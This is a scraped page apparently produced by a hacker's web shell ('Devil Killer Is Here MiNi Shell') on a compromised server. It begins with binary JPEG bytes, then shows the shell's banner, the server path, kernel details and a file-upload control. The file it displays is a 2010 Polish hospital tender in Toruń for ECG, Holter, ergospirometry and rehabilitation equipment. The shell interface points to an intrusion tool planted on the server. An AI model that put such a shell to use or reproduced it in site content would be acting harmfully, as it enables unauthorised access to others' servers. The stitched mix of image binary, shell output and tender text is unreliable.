JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100601/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100601/141301-N-2010.html

<p class="kh_header"><b>Toruń: Dostawa elektrokardiografów, holterów, rejestratorów pętli, zestawu do ergospirometrii i systemu treningu ergometrycznego z ergometrami rehabilitacyjnymi.</b><br>
<b>Numer ogłoszenia: 141301 - 2010; data zamieszczenia: 01.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Zespolony im. L. Rydygiera , ul. Św. Józefa 53/59, 87-100 Toruń, woj. kujawsko-pomorskie, tel. 056 6101510, faks 056 6596128.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-bielany.torun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa elektrokardiografów, holterów, rejestratorów pętli, zestawu do ergospirometrii i systemu treningu ergometrycznego z ergometrami rehabilitacyjnymi..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie Nr 1 - Elektrokardiograf - 2 szt.:<br>
1. Częstotliwość próbkowania sygnału ekg przez aparat - min. 1000 próbek/s;
2. Współczynnik tłumienia szumów przez aparat CMRR>120dB;
3. Rozdzielczość sygnału wejściowego aparatu - min. 4 uV;
4. Zakres częstotliwości pomiarowej aparatu -  min. 0,05-100Hz;
5. Filtr sieciowy 50 Hz;
6. Filtr mięśniowy w zakresie od 20 do 150 Hz;
7. Niwelowanie płynięcia izolinii (automatyczne sprowadzanie linii zerowej);
8. Kolorowy wyświetlacz graficzny LCD min. 7cali;
9. Praca w trybie zasilania sieciowego;
10. Praca w trybie zasilania bateryjnego;
11. Możliwość monitorowania pacjenta z wewnętrznego akumulatora przez min.3 godziny;
12. Czas ładowania akumulatorów max. 2,5 godziny;
13. Rejestracja przebiegów na papierze formatu A4;
14. Równoczesna rejestracja 12 odprowadzeń;
15. Prezentacja graficzna badania w postaci  3, 6 lub 12 krzywych na jednej stronie;
16. Wybór różnych raportów w trybie auto;
17. Pomiar parametrów krzywej ekg;
18. Wykrywanie wszczepionego stymulatora;
19. Zabezpieczenie aparatu przed impulsem defibrylacji;
20. Klawiatura alfanumeryczna plus klawisze funkcyjne i klawisz nawigacji;
21. Masa aparatu do 6 kg; 
22. Badanie ekg - tryb manual;
23. Badanie ekg - tryb auto;
24. Tryb arytmii;
25. Czułość (AUTO, 5, 10 , 20, 40 mm/mV);
26. Prędkość wydruku: 5; 12.5; 25; 50 mm/s;
27. Wyświetlanie danych pacjenta na ekranie; 
28. Wyświetlanie  od 3 do12 przebiegów krzywych EKG na ekranie;
29. Identyfikacja grupy odprowadzeń;
30. Wynik obliczonego parametru HR;
31. Sygnalizacja włączenia / wyłączenia filtrów;
32. Wizualna i akustyczna sygnalizacja braku kontaktu elektrod;
33. Kabel ekg modułowy z możliwością wymiany pojedynczych przewodów pacjenta; 
34. Kabelki pacjenta typu - banan;
35. Wyposażenie w elektrody przedsercowe (przyssawkowe) i  kończynowe (klamrowe); 
36. Wózek z pojemnikiem na akcesoria;
37. Gniazdo karty pamięci typu SD;
38. Wyjście do podłączenia zewnętrznego monitora; 
39. Komunikacja z użytkownikiem w języku polskim; 
40. Okres gwarancji - min 24 miesiące; 
41. Czas reakcji serwisu - w ciągu 24 godzin licząc od momentu zgłoszenia awarii przez użytkownika;
42. Gwarancja zapewnienia zakupu części zamiennych przez okres 10 lat;
43. Bezpłatne szkolenie pracowników Zamawiającego  obsługującego urządzenie;
44. Bezpłatny przegląd techniczny min. 1 raz w roku w okresie trwania gwarancji;
45. Bezpłatna instalacja urządzenia; 
46. Elektrokardiograf zastępczy jeśli naprawa nastąpi w czasie dłuższym niż 5 dni (w okresie gwarancyjnym);
47. Numer kontaktowy z serwisem Wykonawcy;
48. Sposób dezynfekcji urządzenia.<br>
Zadanie Nr 2 - Holter do 24h RR - 5 szt.:<br>
REJESTRATOR
1. Waga urządzenia wraz z bateriami mniejsza niż 240 g;	
2. Wymiary urządzenia;	
3. Minimalny czas rejestracji 52 godziny;
4. Oscylometryczna metoda pomiaru z obniżaniem krokowym;	
5. Zasilanie max. dwie baterie alkaiczne typu AA 1,5 V lub akumulatory;
6. Zakres pomiarowy ciśnienia skurczowego i rozkurczowego 25 - 260 mmHg;	
7. Dokładność pomiaru  ? 3 mmHg lub wyższa;	
8. Zakres pomiarowy częstości tętna  40 - 200 uderz/min;	
9. Rejestrowanie zdarzeń pacjenta - tzw. events;
10. Ograniczenie ciśnienia w mankiecie do 280 mmHg;	
11. Czas pomiaru do 180 sek.;	
12. Maksymalna ilość pomiarów - min 250;
13. Regulowany czas odstępu między pomiarami;
ANALIZATOR
14. Raport konfigurowany przez użytkownika;	
15. Archiwizacja wykonanych badań. Zestaw komputerowy:  jednostka centralna z dyskiem twardym 360GB, procesor Intel lub podobny, monitor LCD min. 19 cali, drukarka  laserowa czarno-biała, zewnętrzny dysk twardy, pamięć typu /pendrive/ oraz DVD - RW;
KONFIGURACJA ZAMAWIANEGO ZESTAWU
16. Rejestrator wraz z osprzętem mocującym;
17. Analizator -oprogramowanie na komputer PC;	
18. Dwa akumulatory rozmiaru AA wraz z ładowarką;	
19. Mankiet dla dorosłych wielokrotnego użytku do pomiaru ciśnienia o wymiarach szerokość 13 cm, długość pierścienia zaciskającego 28 cm na przedramię o obwodzie od 27 do 35 cm współpracujący z rejestratorem - 1 szt.;
WARUNKI  GWARANCJI I  SERWISU		
20. Okres gwarancji - min 24 miesiące;
21. Czas reakcji serwis - max 24 godziny licząc od momentu  zgłoszenia awarii przez użytkownika;	
22. Gwarancja zapewnienia  zakupu części zamiennych  przez okres 10 lat.;
23. Bezpośrednie szkolenie pracowników Zamawiającego obsługujących urządzenie;
24. Bezpłatna instalacja urządzenia;
25. Bezpłatny przegląd techniczny min. 1 raz w roku w okresie trwania gwarancji;
26. Holter zastępczy jeśli naprawa nastąpi w czasie dłuższym niż 5 dni (w okresie gwarancji);	
27. Numer kontaktowy z serwisem Wykonawcy;	
28.Sposób dezynfekcji urządzenia.<br>	
Zadanie Nr 3 - Holter EKG - 1 szt.:<br>
Analiza
1. Komputerowo wspomagana analiza połączona z klasyfikacją zaburzeń;	
2. Możliwość automatycznego rozpoznawania i klasyfikacji zaburzeń komorowych i nadkomorowych;	
3. Analiza wykorzystująca znakowanie kolorem - z określeniem kolorów przez użytkownika;	
4. Analiza prospektywna retrospektywna (interaktywna i automatyczna);
Konfiguracja parametrów analizy		
1. Pobudzeń: analiza równoległa na trzech kanałach;
2. Zaburzeń rytmu: % przedwczesności pobudzeń nadkomorowych, pauzy, tachykardii komorowej, tachykardii nadkomorowej, napadowego częstoskurczu nadkomorowego, tachy/bradykardii nadkomorowej;
3. Algorytm rozpoznawania migotania przedsionków ustawiany przez użytkownika (zmienność z pobudzenia na pobudzenie oraz długość wstawki);	
4. Odcinka ST: niezależna analiza odcinka ST w 3 kanałach z możliwością modyfikacji wszystkich parametrów, określenie progu obniżenia ST, kąta nachylenia ST, czas trwania epizodu niedotlenienia i separacji między epizodami;
5. Analiza zmienności rytmu zatokowego (czasowa i częstotliwościowa);	
6. Analiza funkcji stymulatora: wszystkie rodzaje stymulatorów, rodzaje wykrywanych błędów, tabele stymulacji;	
7. Przeglądanie/edycja;	
8. Przeglądanie całości zapisu EKG we wszystkich 12-u odprowadzeniach;	
9. Przeglądanie pobudzeń, rodzin morfologicznych, tabeli i trendów;
10. Szybkie przeglądanie przez stronicowanie lub metodą nakładania pobudzeń;	
11.Natychmiastowy dostęp do dowolnego fragmentu EKG z każdego poziomu, także od dowolnej wartości liczbowej z raportu;
12. Możliwość reanalizy zapisu po zmianie parametrów analizy - w całości lub dowolnie wybranej części;	
13. Możliwość analizy różnych fragmentów zapisu wg różnych ustawień algorytmu;
14. Automatyczna kalibracja  wzmocnienia z możliwością ręcznej korekty;
15. Automatyczna detekcja znaczników wydarzeń rejestrowanych przez pacjenta;	
16. Wykrywanie zaburzeń R na T;	
Analiza odcinka ST		
1. Dokładna analiza przemieszczenia i nachylenia ST;	
2. Parametry analizy zgodnie z normami AHA;	
3. Lista epizodów niedotlenienia zawierająca poziom i nachylenie ST, czas trwania epizodu, oraz odp. Fragment EKG;	
Archiwizacja danych:		
1. Zestaw komputerowy:  jednostka centralna z dyskiem twardym 360GB, procesor Intel lub podobny, monitor LCD min. 19 cali, drukarka  laserowa czarno-biała, zewnętrzny dysk twardy, pamięć typu /pendrive/ oraz DVD - RW;	
Raporty/wydruki		
1. Programowa: poprzez określenie selekcji raportu /części raportu przeznaczonych do wydruku;	
2. Wydruk wszystkich zapamiętanych wyników badań;	
3. Możliwość edycji formy oraz treści raportów także tworzenie różnych wzorców raportów;	
4. Odniesienie do krzywej EKG z poziomu raportu;
Transmisja danych / archiwizacja		
1. Praca w sieci: odczyt zapisu ekg z rejestratora i przesłanie go w sieci LAN do komputera na którym zainstalowany jest analizator holterowski oraz odwrotnie przesłanie wyniku badania do komputera z którego wysłany był plik EKG;	
2. Możliwość współpracy z centralą sieci kardiomonitorów celem przeprowadzenia analizy 24 godz. zapisu EKG;
3. Współpraca z istniejącym analizatorem holterowskim w Oddziale Kardiologii;	
Rejestrator cyfrowy - 6 szt.		
1. Rejestracja 3 kanałów oraz odrębnego kanału stymulatora we wszystkich rejestratorach;
2. 3 odprowadzeniowy kabel pacjenta  (preferowane jak najmniejsze ilości elektrod - max. 7); 	
3. Wysoka jakość zapisu bez kompresji zapisu;
4. Kontrola jakości sygnału;	
5. Automatyczna rejestracja momentu rozpoczęcia badania - zegar wewnętrzny i pokazywanie czasu bieżącego (data, godzina);	
6. Identyfikacja pacjenta - z możliwością wprowadzenia danych pacjenta przed rozpoczęciem rejestracji;	
7. Możliwość weryfikacji jakości zapisu EKG przed uruchomieniem rejestracji - na ekranie wbudowanym w rejestrator;	
8. Waga rejestratora < 80g;	
9. Zasilanie - max. 1 bateria alkaliczna typu AAA;
Warunki gwarancji i serwisu		
1. Okres gwarancji - min 24 miesiące;	
2. Czas reakcji serwis - w ciągu 24 godziny licząc od momentu  zgłoszenia awarii przez użytkownika;	
3. Gwarancja zapewnienia  zakupu części zamiennych  przez okres 10 lat;	
4. Bezpłatne szkolenie pracowników  Zamawiającego obsługujących urządzenie;
5. Bezpłatny przegląd techniczny min. 1 raz w roku w okresie trwania gwarancji;
6. Bezpłatna instalacja urządzenia;
7. Aparat zastępczy jeśli naprawa nastąpi w czasie dłuższym niż 5 dni (w okresie gwarancji);	
8. Numer kontaktowy z serwisem Wykonawcy;	
9. Sposób dezynfekcji urządzenia.<br>
Zadanie Nr 4:<br> 
I. Rejestrator pętli z wbudowanymi elektrodami - 2 szt.:<br>
1. Zapis cyfrowy bez kompresji, 2 kanałowy;
2. Pojemność pamięci rejestratora min. 20 minut;
3. Częstotliwość próbkowania min. 500Hz;
4. Filtracja zakłóceń; 
5. Tryb pracy w pętli; 
6. Możliwość programowania czasów rejestracji i ilości zapisów; 
7. Wymiary rejestratora max 80x90x30 mm;
8. Waga max 120 gram;
9. Zasilanie z max 1 baterii AA;
10. Czas  pracy w pętli min 30 dni;
11. Czas pracy z przyłożenia min. 1 miesiąc;
12. Wbudowane zewnętrzne elektrody do pracy z przyłożenia; 
13. Współpraca z posiadanym przez szpital oprogramowaniem CardioNavigator;
14. Okres gwarancji - min 24 miesiące;
15. Czas reakcji serwis - w ciągu 24 godziny licząc od momentu  zgłoszenia awarii przez użytkownika; 
16. Gwarancja zapewnienia zakupu części zamiennych  przez okres 10 lat;
17. Bezpłatne  szkolenie  pracowników Zamawiającego obsługujących urządzenie; 
18. Bezpłatny przegląd techniczny min. 1 raz w roku w okresie trwania gwarancji;
19. Bezpłatna instalacja urządzenia;
20. Rejestrator pętli zastępczy jeśli naprawa nastąpi w czasie dłuższym niż 5 dni (w okresie gwarancji); 
21. Numer kontaktowy z serwisem Wykonawcy;
22. Sposób dezynfekcji urządzenia.<br>
II. Rejestrator pętli - 2 szt.<br>
1. Zapis cyfrowy bez kompresji, 2 kanałowy;
2. Pojemność pamięci rejestratora min. 70 minut;
3. Częstotliwość próbkowania min. 500Hz;
4. Filtracja zakłóceń;
5. Tryb pracy w pętli; 
6.Możliwość programowania czasów rejestracji i ilości zapisów; 
7. Wymiary rejestratora max 80x90x30 mm;
8. Waga max 120 gram;
9. Zasilanie z max 1 baterii AA;
10. Czas  pracy min. 14 dni; 
11. Współpraca z posiadanym przez szpital oprogramowaniem CardioNavigator;
12. Okres gwarancji - min 24 miesiące;
13. Czas reakcji serwis - w ciągu 24 godziny licząc od momentu  zgłoszenia awarii przez użytkownika; 
14. Gwarancja zapewnienia zakupu części zamiennych  przez okres 10 lat;
15. Bezpłatne  szkolenie  pracowników Zamawiającego obsługujących urządzenie; 
16. Bezpłatny przegląd techniczny min. 1 raz w roku w okresie trwania gwarancji;
17. Rejestrator pętli zastępczy jeśli naprawa nastąpi w czasie dłuższym niż 5 dni (w okresie gwarancji); 
18. Bezpłatna instalacja urządzenia;  
19. Numer kontaktowy z serwisem Wykonawcy;
20. Sposób dezynfekcji urządzenia.<br>
Zadanie Nr 5 - Zestaw do ergospirometrii (prób wysiłkowych)  - 1 kpl.:<br>
1 System do próby wysiłkowej: 
1.1 Całość (komputer, monitor, drukarka  termiczna) montowana fabrycznie na mobilnym wózku producenta;
1.2 Monitor kolorowy minimum 19cali Medical Grade;
1.3 14 kanałowa akwizycja sygnału EKG;
1.4 Analiza do 12 odprowadzeń EKG jednocześnie;
1.5 Ocena odcinka ST: amplituda, nachylenie, indeks, pętle ST/HR dla wszystkich  odprowadzeń;
1.6 Możliwość opcjonalna 15-kanałowej akwizycji sygnału EKG;
1.7 Drukarka termiczna formatu A4 do wydruku zapisu EKG w czasie rzeczywistym oraz raportów; 	
1.8 Moduł zamieniający sygnał analogowy na cyfrowy mocowany bezpośrednio na pacjencie;
1.9 Prędkość wydruku:  5; 12,5; 25; 50 mm/s;
1.10 Czułość zapisu: 2,5/5/10/20 mm/mV;
1.11 Prezentacja ciągłego zapisu EKG z minimum 6 dowolnych odprowadzeń;
1.12 Prezentacja minimum 6 median bieżących ST;
1.13 Prezentacja uśrednionego zespołu QRS na zespole referencyjnym z numerycznym opisem parametrów ST; 
1.14 Możliwość rozbudowy o eksport wyników do formatu Word/PDF;
1.15 Wykonywanie testów w trybie Ramp;
1.16 Archiwizacja badań na CD /RW;
1.17 Możliwość rozbudowy systemu o oprogramowanie do analizy TWA ze standardowych elektrod w czasie próby wysiłkowej;
1.18 Wbudowana klawiatura funkcyjna do sterowania przebiegiem testu oraz wydrukiem;
1.19 Prezentacja graficzna kontroli impedancji podłączenia elektrod do pacjenta;
1.20 Możliwość rozbudowy o funkcję obliczania czynników  ryzyka choroby wieńcowej;
2. Aparat do nieinwazyjnego pomiaru ciśnienia - 2 szt.;
2.1 Metoda pomiaru tonów korotkowa z bramkowaniem sygnałem EKG;
2.2 Zakresy pomiarowe ciśnienia:
a) skurczowe min. od 50-250 mmHg,
b) rozkurczowe min. od 20-150 mmHg
2.3 Automatyczne wykonywanie pomiarów poprzez sterowanie z systemu analizująco-sterującego; 
2.4 Automatyczna transmisja pomiarów ciśnienia do systemu analizująco- sterującego;
3. Bieżnia diagnostyczna:
3.1 Minimalny zakres prędkości pasa ruchomego: 0-21,5 km/godz.;
3.2 Minimalny zakres kąta uniesienia: 0- 25%;
3.3 Maksymalna zewnętrzna długość bieżni:  200 cm;
3.4 Minimalna szerokość użytkowa pasa ruchomego bieżni: 45 cm;
3.5 Obciążenie dopuszczalne: nie mniejsze niż 200 kg;
3.6 Poręcze boczne i przednia;
3.7 Wyłącznik bezpieczeństwa;
3.8 Taśma pasa ruchomego antypoślizgowa i antystatyczna;
4. Ergometr rowerowy:
4.1 Zakres obciążeń min. od 6 do 999 [W];
4.2 Zakres obrotów min. od 30 do 130 [obr/min.];
4.3 Aparat posiadający wyświetlacz graficzny LCD min. 115 x80 [mm];
4.4 Maksymalne możliwe obciążenia min. 140 [kg];
4.5 Oprogramowanie wewnętrzne umożliwiające konfigurowanie testu przez użytkownika;
4.6 Na wyposażeniu interfejs do sterowania ergometrem, programowania parametrów i alarmów;
4.7 Regulacja elektryczna siodełka, ciągła dla pacjentów o wzroście od 120 do 210 cm;
4.8 Aparat wyposażony w automatyczny pomiar ciśnienia;
4.9 Regulacja kierownicy (wysokość i kąt);
5. Aparat do pomiaru zużycia CO2 i O2 w czasie wysiłku:
5.1 Interfejs komunikacyjny z częścią do  próby wysiłkowej; 
5.2 Ocena gazów wydechowych metodą oddech po oddechu;
5.3 Automatyczne określanie progu anaerobowego z możliwością ręcznej korekty;
5.4 Standardowa i rozszerzona spirometria wg standardów ATS/ERS 2005, pomiary min.: FVC, FEV1, PEFR, FEV6, ERV, pętle PFV, VC, IC, SVC, MVV, RR, VO2, VO2/kg, VCO2, RQ, HR, WATT, VE, VEO2, VT, SPO2;
5.5 Bieżąca prezentacja graficzna na ekranie monitora w postaci tabularycznej i wykresów wybranych przez użytkownika parametrów otrzymywanych wyników pomiarowych; 
5.6 Kalibracja przepływomierza dla różnych zakresów pomiarowych;
5.7 Automatyczna kalibracja analizatorów gazowych;
5.8 System automatycznej kontroli jakości wykonywanych pomiarów oraz  kalibracji; 
5.9 Rozbudowana biblioteka wzorcowych dedykowanych raportów końcowych z możliwością tworzenia własnych raportów;
5.10 Możliwość podłączenia przystawki do prób prowokacyjnych z lekami;
5.11 Impedancyjny czujnik przepływu;
5.12 Elektrochemiczny czujnik stężenia tlenu (O2);
5.13 Pomiar wydatku energetycznego;
5.14 Niedyspersyjny czujnik stężenia dwutlenku węgla (CO2);
5.15 Zakresy pomiarowe:
Dla O2 minimum 0-100% z dokładnością +/- 0,02% lub wyższą,
Dla CO2 minimum 0-15% z dokładnością +/- 0,02% lub wyższą,
Dla przepływu minimum 0-16 l/sek z dokładnością +/- 0,3%;
5.16 Zakres rozdzielczości pomiaru:
Dla O2 i CO2  minimum 0,01%
Dla przepływu minimum 0,003 l/sek; 
5.17 PC, drukarka kolorowa, monitor LCD typu Medical  Grade  min. 17 cali; 
5.18 Wózek z transformatorem i pokrowcami na butle kalibracyjne;
5.19 Protokoły sterowania kompatybilne z systemem wysiłkowym;
5.20 Zestaw wyposażony w akcesoria startowe do wykonywania badań ergospirometrycznych; 
5.21 Butle kalibracyjne o pojemności 88 litrów;
5.22 Awaryjny zasilacz typu UPS;
6. Warunki gwarancji i serwisu:  
6.1 Okres gwarancji - min 24 miesiące; 
6.2 Czas reakcji serwisu - w ciągu 24 godzin licząc od momentu zgłoszenia awarii przez użytkownika;
6.3 Gwarancja zapewnienia zakupu części zamiennych przez okres 10 lat
6.4 Bezpłatne szkolenie pracowników Zamawiającego  obsługującego urządzenie;
6.5 Bezpłatny przegląd techniczny min. 1 raz w roku w okresie trwania gwarancji;
6.6 Zestaw do  ergospirometrii zastępczy jeśli naprawa nastąpi w czasie dłuższym niż 5 dni (w okresie gwarancji); 
6.7 Bezpłatna instalacja urządzenia; 
6.8 Numer kontaktowy z serwisem Wykonawcy;
6.9 Sposób dezynfekcji urządzenia.<br>
Zadanie Nr 6 - System treningu ergometrycznego (rehabilitacji kardiologicznej) z ergometrami rehabilitacyjnymi   -  1 kpl.:<br>
1.  Ergometr rowerowy - 5 szt.;
1.1 Zakres obciążeń 20 - 999 W;
1.2 Zakres obrotów min. 30 - 130 obr/min;
1.3 Waga ergometru max 70 kg;
1.4 Wbudowany ekran LCD do prezentacji danych oraz parametrów treningu;
1.5 Niezależne wyświetlacze informacyjne dla pacjenta oraz dla obsługi;
1.6 Możliwość kalibracji softwarowej przy pomocy wbudowanej klawiatury przy pomocy niezależnego wzorca masy;
1.7 Złącze RS-232 - 3 porty, port analogowy; 
2. System sterujący z oprogramowanie 1 kpl.;
2.1 Pełna kontrola oraz programowanie treningu ze stanowiska sterującego;
2.2 Możliwość indywidualnego programowania treningu dla każdego z ergometrów ze stanowiska sterującego;
2.3 Możliwość zaprogramowania stałej fazy rozgrzewki;
2.4 Różne rodzaje treningów:
-	trening interwałowy
-	trening sterowany tętnem
-	trening ze stałym obciążeniem;
2.5 Prezentacja wszystkich danych treningu wraz z krzywą EKG na centralnym monitorze stanowiska sterującego;
2.6 Prezentacja na monitorze zestawu sterującego PC aktualnych parametrów treningu dla każdego z ergometrów:
-	wartości obciążenia
-	wartości tętna
-	krzywej EKG;
2.7 Możliwość zmiany obciążenia w trakcie treningu na każdym z ergometrów ze stanowiska sterującego;
2.8 Możliwość zaprogramowania indywidualnych procedur treningowych;
2.9 Zintegrowana baza danych pacjentów;
2.10 Możliwość wydruku diagramów treningowych; 
2.11 Możliwość rozszerzenia systemu do 16 stanowisk sterowanych z jednego komputera sterującego;
2.12 Awaryjny zasilacz typu UPS;
3. Warunki gwarancji i serwisu;
3.1 Okres gwarancji - min 24 miesiące;
3.2 Czas reakcji serwisu - w ciągu 24 godzin licząc od momentu zgłoszenia awarii przez użytkownika;
3.3 Gwarancja zapewnienia zakupu części zamiennych przez okres 10 lat;
3.4 Bezpłatne szkolenie pracowników Zamawiającego obsługujących urządzenie;
3.5 Bezpłatna instalacja urządzeń; 
3.6 Bezpłatny przegląd techniczny min. 1 raz w roku w okresie trwania gwarancji;
3.7 System treningu ergometrycznego zastępczy jeśli naprawa nastąpi w czasie dłuższym niż 5 dni (w okresie gwarancji); 
3.8 Numer kontaktowy z serwisem Wykonawcy;
3.9 Sposób dezynfekcji urządzenia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.12.32.00-0, 38.42.30.00-6, 33.10.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełniania warunku posiadania uprawnień do wykonywania określonej działalności lub czynności Zamawiający nie określa szczegółowego warunku udziału.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz wykonanych min. 3 dostaw sprzętu medycznego o wartości min. dla poszczególnych zadań:
